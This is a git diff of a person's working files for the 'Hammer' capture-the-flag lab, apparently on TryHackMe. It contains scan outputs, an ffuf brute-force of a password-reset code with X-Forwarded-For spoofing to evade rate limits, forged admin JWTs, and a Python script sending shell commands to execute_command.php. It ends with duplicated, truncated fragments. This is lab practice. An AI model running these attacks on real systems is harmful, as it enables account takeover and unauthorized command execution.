initial commit

2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
--- a/CTF/Hammer/188ade1.key
+++ b/CTF/Hammer/188ade1.key
@@ -0,0 +1 @@
+56058354efb3daa97ebab00fabd7a7d7
--- a/CTF/Hammer/cut_ip_list.txt
+++ b/CTF/Hammer/cut_ip_list.txt
--- a/CTF/Hammer/error.logs
+++ b/CTF/Hammer/error.logs
@@ -0,0 +1,9 @@
+[Mon Aug 19 12:00:01.123456 2024] [core:error] [pid 12345:tid 139999999999999] [client 192.168.1.10:56832] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:01:22.987654 2024] [authz_core:error] [pid 12346:tid 139999999999998] [client 192.168.1.15:45918] AH01630: client denied by server configuration: /var/www/html/
+[Mon Aug 19 12:02:34.876543 2024] [authz_core:error] [pid 12347:tid 139999999999997] [client 192.168.1.12:37210] AH01631: user tester@hammer.thm: authentication failure for "/restricted-area": Password Mismatch
+[Mon Aug 19 12:03:45.765432 2024] [authz_core:error] [pid 12348:tid 139999999999996] [client 192.168.1.20:37254] AH01627: client denied by server configuration: /etc/shadow
+[Mon Aug 19 12:04:56.654321 2024] [core:error] [pid 12349:tid 139999999999995] [client 192.168.1.22:38100] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/protected
+[Mon Aug 19 12:05:07.543210 2024] [authz_core:error] [pid 12350:tid 139999999999994] [client 192.168.1.25:46234] AH01627: client denied by server configuration: /home/hammerthm/test.php
+[Mon Aug 19 12:06:18.432109 2024] [authz_core:error] [pid 12351:tid 139999999999993] [client 192.168.1.30:40232] AH01617: user tester@hammer.thm: authentication failure for "/admin-login": Invalid email address
+[Mon Aug 19 12:07:29.321098 2024] [core:error] [pid 12352:tid 139999999999992] [client 192.168.1.35:42310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:09:51.109876 2024] [core:error] [pid 12354:tid 139999999999990] [client 192.168.1.50:45998] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/locked-down
--- a/CTF/Hammer/ffuf_command.txt
+++ b/CTF/Hammer/ffuf_command.txt
--- a/CTF/Hammer/ffuf_dir_scan1.txt
+++ b/CTF/Hammer/ffuf_dir_scan1.txt
@@ -0,0 +1 @@
+{"commandline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","time":"2025-10-23T16:34:23+02:00","results":[{"input":{"FFUFHASH":"aeb1810","FUZZ":"images"},"position":16,"status":301,"length":320,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_images/","scraper":{},"duration":2872600688,"resultfile":"","url":"http://hammer.thm:1337/hmr_images","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb18225","FUZZ":"css"},"position":549,"status":301,"length":317,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_css/","scraper":{},"duration":79097324,"resultfile":"","url":"http://hammer.thm:1337/hmr_css","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb183ba","FUZZ":"js"},"position":954,"status":301,"length":316,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_js/","scraper":{},"duration":127030112,"resultfile":"","url":"http://hammer.thm:1337/hmr_js","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb188c9","FUZZ":"logs"},"position":2249,"status":301,"length":318,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_logs/","scraper":{},"duration":177266148,"resultfile":"","url":"http://hammer.thm:1337/hmr_logs","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","configfile":"","postdata":"","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf_dir_scan1.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/hmr_FUZZ","verbose":false,"wordlists":["/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt"],"http2":false,"client-cert":"","client-key":""}}
--- a/CTF/Hammer/ffuf_numbers.txt
+++ b/CTF/Hammer/ffuf_numbers.txt
--- a/CTF/Hammer/ffuf_scan1.txt
+++ b/CTF/Hammer/ffuf_scan1.txt
--- a/CTF/Hammer/gobuster_scan1.txt
+++ b/CTF/Hammer/gobuster_scan1.txt
@@ -0,0 +1,3 @@
+/javascript          [36m (Status: 301)[0m [Size: 320][34m [--> http://hammer.thm:1337/javascript/][0m
+/vendor              [36m (Status: 301)[0m [Size: 316][34m [--> http://hammer.thm:1337/vendor/][0m
+/phpmyadmin          [36m (Status: 301)[0m [Size: 320][34m [--> http://hammer.thm:1337/phpmyadmin/][0m
--- a/CTF/Hammer/hist/188ade1.key
+++ b/CTF/Hammer/hist/188ade1.key
@@ -0,0 +1 @@
+56058354efb3daa97ebab00fabd7a7d7
--- a/CTF/Hammer/hist/composer.json
+++ b/CTF/Hammer/hist/composer.json
@@ -0,0 +1,42 @@
+{
+    "name": "firebase/php-jwt",
+    "description": "A simple library to encode and decode JSON Web Tokens (JWT) in PHP. Should conform to the current spec.",
+    "homepage": "https://github.com/firebase/php-jwt",
+    "keywords": [
+        "php",
+        "jwt"
+    ],
+    "authors": [
+        {
+            "name": "Neuman Vong",
+            "email": "neuman+pear@twilio.com",
+            "role": "Developer"
+        },
+        {
+            "name": "Anant Narayanan",
+            "email": "anant@php.net",
+            "role": "Developer"
+        }
+    ],
+    "license": "BSD-3-Clause",
+    "require": {
+        "php": "^7.4||^8.0"
+    },
+    "suggest": {
+        "paragonie/sodium_compat": "Support EdDSA (Ed25519) signatures when libsodium is not present",
+        "ext-sodium": "Support EdDSA (Ed25519) signatures"
+    },
+    "autoload": {
+        "psr-4": {
+            "Firebase\\JWT\\": "src"
+        }
+    },
+    "require-dev": {
+        "guzzlehttp/guzzle": "^6.5||^7.4",
+        "phpspec/prophecy-phpunit": "^2.0",
+        "phpunit/phpunit": "^9.5",
+        "psr/cache": "^1.0||^2.0",
+        "psr/http-client": "^1.0",
+        "psr/http-factory": "^1.0"
+    }
+}
--- a/CTF/Hammer/hist/count-9999.txt
+++ b/CTF/Hammer/hist/count-9999.txt
--- a/CTF/Hammer/hist/error.logs
+++ b/CTF/Hammer/hist/error.logs
@@ -0,0 +1,9 @@
+[Mon Aug 19 12:00:01.123456 2024] [core:error] [pid 12345:tid 139999999999999] [client 192.168.1.10:56832] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:01:22.987654 2024] [authz_core:error] [pid 12346:tid 139999999999998] [client 192.168.1.15:45918] AH01630: client denied by server configuration: /var/www/html/
+[Mon Aug 19 12:02:34.876543 2024] [authz_core:error] [pid 12347:tid 139999999999997] [client 192.168.1.12:37210] AH01631: user tester@hammer.thm: authentication failure for "/restricted-area": Password Mismatch
+[Mon Aug 19 12:03:45.765432 2024] [authz_core:error] [pid 12348:tid 139999999999996] [client 192.168.1.20:37254] AH01627: client denied by server configuration: /etc/shadow
+[Mon Aug 19 12:04:56.654321 2024] [core:error] [pid 12349:tid 139999999999995] [client 192.168.1.22:38100] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/protected
+[Mon Aug 19 12:05:07.543210 2024] [authz_core:error] [pid 12350:tid 139999999999994] [client 192.168.1.25:46234] AH01627: client denied by server configuration: /home/hammerthm/test.php
+[Mon Aug 19 12:06:18.432109 2024] [authz_core:error] [pid 12351:tid 139999999999993] [client 192.168.1.30:40232] AH01617: user tester@hammer.thm: authentication failure for "/admin-login": Invalid email address
+[Mon Aug 19 12:07:29.321098 2024] [core:error] [pid 12352:tid 139999999999992] [client 192.168.1.35:42310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:09:51.109876 2024] [core:error] [pid 12354:tid 139999999999990] [client 192.168.1.50:45998] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/locked-down
--- a/CTF/Hammer/hist/fake-ip-cut.txt
+++ b/CTF/Hammer/hist/fake-ip-cut.txt
--- a/CTF/Hammer/hist/fake-ip.txt
+++ b/CTF/Hammer/hist/fake-ip.txt
--- a/CTF/Hammer/hist/gobuster.output
+++ b/CTF/Hammer/hist/gobuster.output
@@ -0,0 +1,21 @@
+===============================================================
+Gobuster v3.6
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://hammer.thm:1337/
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
+[+] Negative Status codes:   404
+[+] User Agent:              gobuster/3.6
+[+] Timeout:                 10s
+===============================================================
+Starting gobuster in directory enumeration mode
+===============================================================
+/phpmyadmin           (Status: 301) [Size: 320] [--> http://hammer.thm:1337/phpmyadmin/]
+/vendor               (Status: 301) [Size: 316] [--> http://hammer.thm:1337/vendor/]
+Progress: 141708 / 141709 (100.00%)
+===============================================================
+Finished
+===============================================================
+
--- a/CTF/Hammer/hist/hammer.webp
+++ b/CTF/Hammer/hist/hammer.webp
--- a/CTF/Hammer/hist/nmap.output
+++ b/CTF/Hammer/hist/nmap.output
@@ -0,0 +1,33 @@
+Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-12 13:24 CEST
+Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
+SYN Stealth Scan Timing: About 1.43% done; ETC: 13:25 (0:01:09 remaining)
+Nmap scan report for hammer.thm (10.10.90.79)
+Host is up (0.045s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT     STATE SERVICE VERSION
+22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 40:1d:40:df:3a:40:83:e2:fb:2f:87:92:fb:e3:dd:a9 (RSA)
+|   256 af:94:ea:e6:88:91:3d:be:f8:c7:1a:07:b9:0b:9e:24 (ECDSA)
+|_  256 57:e7:f3:97:dd:81:d7:30:3b:5a:b7:12:03:20:50:21 (ED25519)
+1337/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
+| http-cookie-flags: 
+|   /: 
+|     PHPSESSID: 
+|_      httponly flag not set
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+|_http-title: Login
+Device type: general purpose
+Running: Linux 4.X
+OS CPE: cpe:/o:linux:linux_kernel:4.15
+OS details: Linux 4.15
+Network Distance: 2 hops
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 256/tcp)
+HOP RTT      ADDRESS
+1   46.33 ms 10.14.0.1
+2   46.48 ms hammer.thm (10.10.90.79)
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 118.35 seconds
--- a/CTF/Hammer/hist/output.txt
+++ b/CTF/Hammer/hist/output.txt
@@ -0,0 +1 @@
+{"commandline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o output.txt","time":"2025-04-12T14:20:19+02:00","results":[{"input":{"FFUFHASH":"49c3b84b","W1":"2122","W2":"192.168.0.122"},"position":2123,"status":200,"length":2190,"words":595,"lines":53,"content-type":"text/html; charset=UTF-8","redirectlocation":"","scraper":{},"duration":43169327,"resultfile":"","url":"http://hammer.thm:1337/reset_password.php","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o output.txt","configfile":"","postdata":"recovery_code=W1\u0026s=80","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=67ns90g5fomm1s17dno6d7uk32","X-Forwarded-For":"W2"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"pitchfork","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"W1","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt","encoders":"","template":""},{"name":"wordlist","keyword":"W2","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{"regexp":{"value":"Invalid"},"word":{"value":"1"}},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"output.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":100,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/reset_password.php","verbose":false,"wordlists":["/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt:W1","/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt:W2"],"http2":false,"client-cert":"","client-key":""}}
--- a/CTF/Hammer/hist/possible_user.txt
+++ b/CTF/Hammer/hist/possible_user.txt
@@ -0,0 +1 @@
+tester@hammer.thm
--- a/CTF/Hammer/hist/source-dashboard-php.txt
+++ b/CTF/Hammer/hist/source-dashboard-php.txt
@@ -0,0 +1,91 @@
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Dashboard</title>
+    <link href="/hmr_css/bootstrap.min.css" rel="stylesheet">
+    <script src="/hmr_js/jquery-3.6.0.min.js"></script>
+    <style>
+        body {
+            background: url('/hmr_images/hammer.webp') no-repeat center center fixed;
+            background-size: cover;
+        }
+        .container {
+            position: relative;
+            z-index: 10; /* Make sure the content is above the background */
+            background-color: rgba(255, 255, 255, 0.8); /* Slight white background for readability */
+            padding: 20px;
+            border-radius: 10px;
+        }
+    </style>
+	
+	    <script>
+       
+        function getCookie(name) {
+            const value = `; ${document.cookie}`;
+            const parts = value.split(`; ${name}=`);
+            if (parts.length === 2) return parts.pop().split(';').shift();
+        }
+
+      
+        function checkTrailUserCookie() {
+            const trailUser = getCookie('persistentSession');
+            if (!trailUser) {
+          
+                window.location.href = 'logout.php';
+            }
+        }
+
+       
+        setInterval(checkTrailUserCookie, 1000); 
+    </script>
+
+</head>
+<body>
+<div class="container mt-5">
+    <div class="row justify-content-center">
+        <div class="col-md-6">
+            <h3>Welcome, Thor! - Flag: THM{AuthBypass3D}</h3>
+            <p>Your role: user</p>
+            
+            <div>
+                <input type="text" id="command" class="form-control" placeholder="Enter command">
+                <button id="submitCommand" class="btn btn-primary mt-3">Submit</button>
+                <pre id="commandOutput" class="mt-3"></pre>
+            </div>
+            
+            <a href="logout.php" class="btn btn-danger mt-3">Logout</a>
+        </div>
+    </div>
+</div>
+
+<script>
+$(document).ready(function() {
+    $('#submitCommand').click(function() {
+        var command = $('#command').val();
+        var jwtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzQ0NDYxMzkwLCJleHAiOjE3NDQ0NjQ5OTAsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.CtEofSfkpfpiUx3jureTlS29FfzVOLLkZVaYrl8oP3M';
+
+        // Make an AJAX call to the server to execute the command
+        $.ajax({
+            url: 'execute_command.php',
+            method: 'POST',
+            data: JSON.stringify({ command: command }),
+            contentType: 'application/json',
+            headers: {
+                'Authorization': 'Bearer ' + jwtToken
+            },
+            success: function(response) {
+                $('#commandOutput').text(response.output || response.error);
+            },
+            error: function() {
+                $('#commandOutput').text('Error executing command.');
+            }
+        });
+    });
+});
+</script>
+</body>
+</html>
+
--- a/CTF/Hammer/index.php
+++ b/CTF/Hammer/index.php
@@ -0,0 +1,36 @@
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Login</title>
+    <link href="/hmr_css/bootstrap.min.css" rel="stylesheet">
+	<!-- Dev Note: Directory naming convention must be hmr_DIRECTORY_NAME -->
+
+
+</head>
+<body>
+<div class="container mt-5">
+    <div class="row justify-content-center">
+        <div class="col-md-4">
+            <h3 class="text-center">Login</h3>
+                        <form method="POST" action="">
+                <div class="mb-3">
+                    <label for="email" class="form-label">Email</label>
+                    <input type="text" class="form-control" id="email" name="email" required>
+                </div>
+                <div class="mb-3">
+                    <label for="password" class="form-label">Password</label>
+                    <input type="password" class="form-control" id="password" name="password" required>
+                </div>
+                <button type="submit" class="btn btn-primary w-100">Login</button>
+                <div class="mt-3 text-center">
+                    <a href="reset_password.php">Forgot your password?</a>
+                </div>
+            </form>
+        </div>
+    </div>
+</div>
+</body>
+</html>
--- a/CTF/Hammer/ip_list.txt
+++ b/CTF/Hammer/ip_list.txt
--- a/CTF/Hammer/jwt.txt
+++ b/CTF/Hammer/jwt.txt
@@ -0,0 +1 @@
+eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjM1NDY1LCJleHAiOjE3NjEyMzkwNjUsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.5R6LXmNVMcqMhOrI63yXJdDMxBq1ndpAzNkffyq2qqQ
--- a/CTF/Hammer/nmap_scan1.txt
+++ b/CTF/Hammer/nmap_scan1.txt
@@ -0,0 +1,31 @@
+# Nmap 7.95 scan initiated Thu Oct 23 15:50:08 2025 as: /usr/lib/nmap/nmap --privileged -A -p- -T4 -oN nmap_scan1.txt 10.10.160.193
+Nmap scan report for hammer.thm (10.10.160.193)
+Host is up (0.100s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT     STATE SERVICE VERSION
+22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 d1:2c:73:75:5d:48:77:92:e2:5a:60:f0:86:56:53:b8 (RSA)
+|   256 cf:e6:d5:e5:7d:30:95:b2:9e:f1:85:19:27:3f:6e:50 (ECDSA)
+|_  256 fb:0f:d0:1c:4f:94:bc:77:38:19:bd:b2:0d:53:28:59 (ED25519)
+1337/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
+|_http-title: Login
+| http-cookie-flags: 
+|   /: 
+|     PHPSESSID: 
+|_      httponly flag not set
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+Device type: general purpose
+Running: Linux 4.X
+OS CPE: cpe:/o:linux:linux_kernel:4.15
+OS details: Linux 4.15
+Network Distance: 2 hops
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 3306/tcp)
+HOP RTT       ADDRESS
+1   177.82 ms 10.14.0.1
+2   162.75 ms hammer.thm (10.10.160.193)
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Thu Oct 23 16:04:35 2025 -- 1 IP address (1 host up) scanned in 867.31 seconds
--- a/CTF/Hammer/numbers_list.txt
+++ b/CTF/Hammer/numbers_list.txt
--- a/CTF/Hammer/script.py
+++ b/CTF/Hammer/script.py
@@ -0,0 +1,34 @@
+import requests
+
+IP = '10.10.150.76'
+url = f"http://{IP}:1337/execute_command.php"
+session = "2t8g5kvcql31qk5iuvpgegkki7"
+token_user = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1MTA3LCJleHAiOjE3NjEyNDg3MDcsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.9hrG4miaa7txtC0CaXt0UJsv0Cg4aSKmCD8m6CG9qts'
+token_admin = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L2h0bWwvMTg4YWRlMS5rZXkifQ.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1NjUwLCJleHAiOjE3NjEyNDkyNTAsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJhZG1pbiJ9fQ.Hk_RgyXnBqyBYYzpkkJ-4KqclFfMNqLs41TxJOtRcGE'
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0',
+    'Accept': '*/*',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/json',
+    'X-Requested-With': 'XMLHttpRequest',
+    'Origin': f"http://{IP}:1337",
+    'DNT': '1',
+    'Sec-GPC': '1',
+    'Connection': 'keep-alive',
+    'Referer': f"http://{IP}:1337/dashboard.php",
+    'Cookie': f"PHPSESSID={session}; token={token_admin}; persistentSession=no",
+    'Priority': 'u=0',
+    'Authorization': f"Bearer {token_admin}"
+}
+
+data = {
+#    'command': 'cat /home/ubuntu/flag.txt'
+    'command': 'ls'
+}
+
+print(headers)
+
+response = requests.post(url, headers=headers, data=data)
+print(response.json())
--- a/CTF/Hammer/user.txt
+++ b/CTF/Hammer/user.txt
@@ -0,0 +1 @@
+tester@hammer.thm
				`@@ -0,0 +1 @@`
				{"commandline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","time":"2025-10-23T16:34:23+02:00","results":[{"input":{"FFUFHASH":"aeb1810","FUZZ":"images"},"position":16,"status":301,"length":320,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_images/","scraper":{},"duration":2872600688,"resultfile":"","url":"http://hammer.thm:1337/hmr_images","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb18225","FUZZ":"css"},"position":549,"status":301,"length":317,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_css/","scraper":{},"duration":79097324,"resultfile":"","url":"http://hammer.thm:1337/hmr_css","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb183ba","FUZZ":"js"},"position":954,"status":301,"length":316,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_js/","scraper":{},"duration":127030112,"resultfile":"","url":"http://hammer.thm:1337/hmr_js","host":"hammer.thm:1337"},{"input":{"FFUFHASH":"aeb188c9","FUZZ":"logs"},"position":2249,"status":301,"length":318,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://hammer.thm:1337/hmr_logs/","scraper":{},"duration":177266148,"resultfile":"","url":"http://hammer.thm:1337/hmr_logs","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://hammer.thm:1337/hmr_FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -o ffuf_dir_scan1.txt","configfile":"","postdata":"","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf_dir_scan1.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/hmr_FUZZ","verbose":false,"wordlists":["/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt"],"http2":false,"client-cert":"","client-key":""}}
				`@@ -0,0 +1 @@`
				{"commandline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o output.txt","time":"2025-04-12T14:20:19+02:00","results":[{"input":{"FFUFHASH":"49c3b84b","W1":"2122","W2":"192.168.0.122"},"position":2123,"status":200,"length":2190,"words":595,"lines":53,"content-type":"text/html; charset=UTF-8","redirectlocation":"","scraper":{},"duration":43169327,"resultfile":"","url":"http://hammer.thm:1337/reset_password.php","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o 